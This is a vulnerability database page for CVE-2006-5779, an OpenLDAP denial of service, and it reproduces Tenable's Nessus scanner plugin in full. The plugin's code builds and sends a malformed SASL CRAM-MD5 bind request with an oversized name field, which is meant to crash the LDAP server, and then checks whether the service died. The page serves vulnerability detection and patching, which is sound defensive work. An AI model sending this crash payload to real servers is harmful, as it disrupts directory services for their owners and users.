Vulners
Lucene search
OpenLDAP SASL authcid Name BIND Request DoS
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | CVE-2006-5779 | 8 Feb 202408:16 | – | circl |
 | Preemptive Protection against OpenLDAP BIND Denial of Service Vulnerability | 21 Nov 200600:00 | – | checkpoint_advisories |
 | CVE-2006-5779 | 7 Nov 200618:00 | – | cve |
 | CVE-2006-5779 | 7 Nov 200618:00 | – | cvelist |
 | GLSA-200611-25 : OpenLDAP: Denial of Service vulnerability | 30 Nov 200600:00 | – | nessus |
| Mandrake Linux Security Advisory : openldap (MDKSA-2006:208) | 18 Feb 200700:00 | – | nessus |
| SuSE9 Security Update : openldap2-client (YOU Patch Number 11307) | 24 Sep 200900:00 | – | nessus |
| openSUSE 10 Security Update : openldap2-client (openldap2-client-2282) | 17 Oct 200700:00 | – | nessus |
| SuSE 10 Security Update : openldap2-client (ZYPP Patch Number 2291) | 13 Dec 200700:00 | – | nessus |
| SUSE-SA:2006:072: openldap2-client | 18 Feb 200700:00 | – | nessus |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/archive/1/450728/30/0/threaded |
| nessus | www.nessus.org/u |
| openldap | www.openldap.org/software/release/changes.html |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(23625);
script_version("1.20");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2006-5779");
script_bugtraq_id(20939);
script_name(english:"OpenLDAP SASL authcid Name BIND Request DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is prone to a denial of service attack.");
script_set_attribute(attribute:"description", value:
"The remote host appears to be running OpenLDAP, an open source LDAP
directory implementation.
The version of OpenLDAP installed on the remote host fails to handle
malformed SASL bind requests. An unauthenticated attacker can
leverage this issue to crash the LDAP server on the affected host.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/450728/30/0/threaded");
# http://www.openldap.org/its/index.cgi/Archive.Software%20Bugs?id=4740;expression=authcid%20Name%20BIND%20Request;selectid=4740;usearchives=1
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9daf484d");
script_set_attribute(attribute:"see_also", value:"http://www.openldap.org/software/release/changes.html");
script_set_attribute(attribute:"solution", value:
"Upgrade to OpenLDAP 2.3.29 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/07");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:openldap:openldap");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DENIAL);
script_family(english:"Denial of Service");
script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");
script_dependencies("ldap_detect.nasl");
script_require_ports("Services/ldap", 389);
exit(0);
}
include("global_settings.inc");
include("byte_func.inc");
include("misc_func.inc");
port = get_service(svc:"ldap", default: 389, exit_on_fail: 1);
soc = open_sock_tcp(port);
if (!soc) exit(0);
id = rand() % 1024;
set_byte_order(BYTE_ORDER_BIG_ENDIAN);
req_bind1 =
mkbyte(0x30) + # universal sequence
mkbyte(0x17) + # length of the request
mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
mkbyte(0x60) + # bind request
mkbyte(0x11) + # length of request
mkbyte(2) + # version (3)
mkbyte(1) + mkbyte(3) +
mkbyte(4) + # authentication (SASL)
mkbyte(0) +
mkbyte(0xa3) +
mkbyte(10) +
mkbyte(4) + mkbyte(8) + "CRAM-MD5";
send(socket:soc, data:req_bind1);
res = recv(socket:soc, length:1024);
# If...
if (
# the response is long enough and..
strlen(res) > 5 &&
# it looks like an LDAP message and...
getbyte(blob:res, pos:0) == 0x30 &&
# it's a response to our request.
(mkword(id) + mkbyte(0x61)) >< res
)
{
# Try to kill the server.
id = id - 1;
req_bind2 =
mkbyte(0x30) + # universal sequence
mkbyte(0x82) + mkword(0x041f) + # length of the request
mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
mkbyte(0x60) + # bind request
mkbyte(0x82) + mkword(0x0417) + # length of request
mkbyte(2) + # version (3)
mkbyte(1) + mkbyte(3) +
mkbyte(4) + # authentication (SASL)
mkbyte(0) +
mkbyte(0xa3) +
mkbyte(0x82) + mkword(0x040e) +
mkbyte(4) + mkbyte(8) + "CRAM-MD5" +
mkbyte(4) + mkbyte(0x82) + mkword(0x0400) + crap(data:" ", length:1024);
send(socket:soc, data:req_bind2);
res = recv(socket:soc, length:1024);
close(soc);
# If we didn't get a response, try to open another connection.
if (strlen(res) == 0)
{
sleep(1);
if (service_is_dead(port: port) > 0)
{
security_warning(port);
exit(0);
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2022 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
CVSS 3.17.5
EPSS0.43371